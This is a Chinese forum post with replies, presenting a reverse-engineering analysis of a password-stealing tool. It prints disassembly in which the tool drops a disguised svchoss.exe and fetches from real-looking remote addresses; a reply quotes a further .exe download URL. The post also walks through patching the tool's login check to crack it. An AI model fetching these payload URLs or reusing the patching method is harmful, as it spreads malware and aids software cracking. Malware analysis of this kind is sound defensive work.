记录对某盗号软件一次分析报告!
本帖最后由 夜陌 于 2021-2-2 15:12 编辑记录对某盗号软件一次分析报告!
好久没更新东西了,最近一直在忙没怎么看消息,这次事情原由是 “娱乐圈黑客”,跑到我群里刷广告
然后我就加群
震惊,,,我点进去一看 我以为都是他写的工具 一看,,
放肆,我是读春秋的,你怎么能放这些 内容?
我先替你们看一下 !!你们别学坏敖!然后 看了一下工具
然后丢尽od 开始 跑起来 分析的时候
不是吧,2021还有人玩这个 ?开始看了一眼 没仔细研究 是自写验证 正准备不耐烦关闭程序调试的时候 我在底部看到这个动作!
0040AECA/$55 push ebp
0040AECB|.8BEC mov ebp,esp
0040AECD|.81EC 0C000000 sub esp,0xC
0040AED3|.C745 FC 00000>mov ,0x0
0040AEDA|.6A 01 push 0x1
0040AEDC|.68 02000000 push 0x2
0040AEE1|.6A 01 push 0x1
0040AEE3|.68 02000000 push 0x2
0040AEE8|.E8 4B010000 call 客户端.0040B038
0040AEED|.68 04000080 push 0x80000004
0040AEF2|.6A 00 push 0x0
0040AEF4|.68 9B60C601 push 客户端.01C6609B ;svchoss.exe
0040AEF9|.68 01000000 push 0x1
0040AEFE|.B8 02000000 mov eax,0x2
0040AF03|.BB A0E84A00 mov ebx,<客户端.未知命令>
0040AF08|.E8 25380300 call 客户端.0043E732 ;jmp 到 <客户端.三方支持库命令>
0040AF0D|.83C4 10 add esp,0x10
0040AF10|.68 04000080 push 0x80000004
0040AF15|.6A 00 push 0x0
0040AF17|.68 A760C601 push 客户端.01C660A7 ;C:\Windows\svchoss.exe
0040AF1C|.68 01000000 push 0x1
0040AF21|.BB 20074400 mov ebx,客户端.00440720
0040AF26|.E8 E9370300 call 客户端.0043E714 ;jmp 到 <客户端.核心支持库命令>
0040AF2B|.83C4 10 add esp,0x10
0040AF2E|.68 04000080 push 0x80000004
0040AF33|.6A 00 push 0x0
0040AF35|.68 BE60C601 push 客户端.01C660BE ;http://23.224.244.121/wtr.txt
0040AF3A|.68 01000000 push 0x1
0040AF3F|.B8 0B000000 mov eax,0xB
0040AF44|.BB A0AB4C00 mov ebx,客户端.004CABA0
0040AF49|.E8 E4370300 call 客户端.0043E732 ;jmp 到 <客户端.三方支持库命令>
0040AF4E|.83C4 10 add esp,0x10
0040AF51|.8945 F8 mov ,eax
0040AF54|.68 05000080 push 0x80000005
0040AF59|.6A 00 push 0x0
0040AF5B|.8B45 F8 mov eax,
0040AF5E|.85C0 test eax,eax
0040AF60|.75 05 jnz short 客户端.0040AF67
0040AF62|.B8 2E60BD01 mov eax,客户端.01BD602E
0040AF67|>50 push eax
0040AF68|.68 01000000 push 0x1
0040AF6D|.BB 10044400 mov ebx,客户端.00440410
0040AF72|.E8 9D370300 call 客户端.0043E714 ;jmp 到 <客户端.核心支持库命令>
0040AF77|.83C4 10 add esp,0x10
0040AF7A|.8945 F4 mov ,eax
0040AF7D|.8B5D F8 mov ebx,
0040AF80|.85DB test ebx,ebx
0040AF82|.74 09 je short 客户端.0040AF8D
0040AF84|.53 push ebx
0040AF85|.E8 A2370300 call 客户端.0043E72C ;jmp 到 <客户端.释放内存>
0040AF8A|.83C4 04 add esp,0x4
0040AF8D|>8B45 F4 mov eax, ;KernelBa.75201425
0040AF90|.50 push eax
0040AF91|.8B5D FC mov ebx,
0040AF94|.85DB test ebx,ebx
0040AF96|.74 09 je short 客户端.0040AFA1
0040AF98|.53 push ebx
0040AF99|.E8 8E370300 call 客户端.0043E72C ;jmp 到 <客户端.释放内存>
0040AF9E|.83C4 04 add esp,0x4
0040AFA1|>58 pop eax ;ntdll.76E26A04
0040AFA2|.8945 FC mov ,eax
0040AFA5|.B8 A760C601 mov eax,客户端.01C660A7 ;C:\Windows\svchoss.exe
0040AFAA|.8945 F8 mov ,eax
0040AFAD|.8D45 F8 lea eax,
0040AFB0|.50 push eax
0040AFB1|.8D45 FC lea eax,
0040AFB4|.50 push eax
0040AFB5|.E8 6E020000 call 客户端.0040B228
0040AFBA|.8B5D F8 mov ebx,
0040AFBD|.85DB test ebx,ebx
0040AFBF|.74 09 je short 客户端.0040AFCA
看到以上内容 可以看得出来 这个孩子在C 盘 Windows 释放出svchoss.exe ,
老油条肯定知道 这孩子 是在干嘛 ,牛皮 ,本来玩盗号 就是缺德事情,这孩子竟然玩黑吃黑 有头脑。
我已经在监狱替你留了一个房间! 然后就顺手开始 分析爆破过程吧!
下个标配三连 断点,MessageBeep ,MessageBoxA,MessageBoxExa 我们在错误断点上面retn pop 头部 下个断点!
断下来之后单步下去 看他在 干嘛 !
不用多说这里吧,在 链接验证地址!
0040F63E|.E8 F5F00200 call 客户端.0043E738 ;获取账号
0040F643|.83C4 10 add esp,0x10
0040F646|.8945 F0 mov ,eax
0040F649|.FF35 38F8CF02 push dword ptr ds: ;388392
0040F64F|.68 6FBFC701 push 客户端.01C7BF6F ;&Guid=
0040F654|.FF75 F0 push
0040F657|.68 A0BEC701 push 客户端.01C7BEA0 ;&pwd=
0040F65C|.FF75 F4 push
0040F65F|.68 2361C601 push 客户端.01C66123 ;name=
0040F664|.B9 06000000 mov ecx,0x6
0040F669|.E8 A31BFFFF call 客户端.00401211
这段呢 就是获取账号密码 ,也不用多研究!
这里呢 就是链接发包 就不用继续看了 继续F8走
这里这个call呢 就是返回 关键点 就在 这里,返回了一个-2 我们在看字串 对比
账号密码错误 也就明白 返回-2 是嘛 意思,ok这里就是我们要分析的核心了,重新运行一次 下个断点 在这个call 断下来 之后 进call 一步步寻找对比 这是个很烦躁的过程!
进去之后 我们就到了易语言的核心支持库 然后 在这里他会发包
费劲 继续 !一直发包 然后返回出数组出来 这在他服务器做校验 没法呀,真当难搞的时候 想起来 正常程序都是 登录失败 附近肯定有登录成功!于是我翻了翻下面 有个东西 引起我的注意
0040FAD2|> \68 02000080 push 0x80000002
0040FAD7|.6A 00 push 0x0
0040FAD9|.68 00000000 push 0x0
0040FADE|.6A 00 push 0x0
0040FAE0|.6A 00 push 0x0
0040FAE2|.6A 00 push 0x0
0040FAE4|.68 04000080 push 0x80000004
0040FAE9|.6A 00 push 0x0
0040FAEB|.68 E1BFC701 push 客户端.01C7BFE1 ;|1
0040FAF0|.68 04000080 push 0x80000004
0040FAF5|.6A 00 push 0x0
0040FAF7|.8B45 FC mov eax,
0040FAFA|.85C0 test eax,eax
其他都是负数 而这个是正的 是不是就是登录成功呢 ? 于是我将jnz改成 jmp 跳到这里
0040F808 /E9 C5020000 jmp 客户端.0040FAD2
0040F80D |90 nop
0040F80E |90 nop
0040F80F |90 nop
0040F810|. |6A 00 push 0x0
0040F812|. |6A 00 push 0x0
0040F814|. |68 04000080 push 0x80000004
0040F819|. |6A 00 push 0x0
0040F81B|. |68 76BFC701 push 客户端.01C7BF76 ;提示
0040F820|. |68 01030080 push 0x80000301
0040F825|. |6A 00 push 0x0
0040F827|. |68 00000000 push 0x0
0040F82C|. |68 04000080 push 0x80000004
0040F831|. |6A 00 push 0x0
0040F833|. |68 7BBFC701 push 客户端.01C7BF7B ;帐号密码格式不正确
这里的cmp 需要注意了 cmp 0x1 这里应该是 如果1成立 je将不会执行他下面代码 所以 我们需要改成0
然后 成功爆破进来,林北,赛林母寄卖 !(懂的人 自然懂!) 然后 没什么卵用,一看就是开源程序改的 (这很黑客!) 其实还有一种更简单的破解方式,就是用抓包软件 把返回包 改成 丨1这个特征 就可以直接破解!我对这玩意儿没兴趣,本来搞别人号就是缺德事,在加上这还黑吃黑 这孩子 厉害 厉害! 最后说一句,网络不是法外之地,劝孩子 趁早收手!
有程序的 直接私信发下载地址,抽空我会挑继续分享教程给你们!然后 回复本贴发言有福利 你信么? 小图 发表于 2021-2-2 15:27
大佬我运行他代码里的http://103.45.185.103:949/111.exe 会怎么样啊没事吧
默默的传到Virscan了,等他更新吧。 大佬我运行他代码里的http://103.45.185.103:949/111.exe 会怎么样啊没事吧 大哥,排版再弄一下吧 学习了新的技术
感觉大佬分享学习 谢谢楼主,最好排一下版{:301_976:} 大佬果然是大佬,但是你的排版看的眼睛酸痛啊{:301_1009:} {:301_977:} 欺骗密码吧,程序方面无亮点 因为用的 word写的然后直接复制进来 所以 乱了 一点尽量吧 大佬大佬,OD我都没学会 不说啥话了。大佬牛皮。收下我的膝盖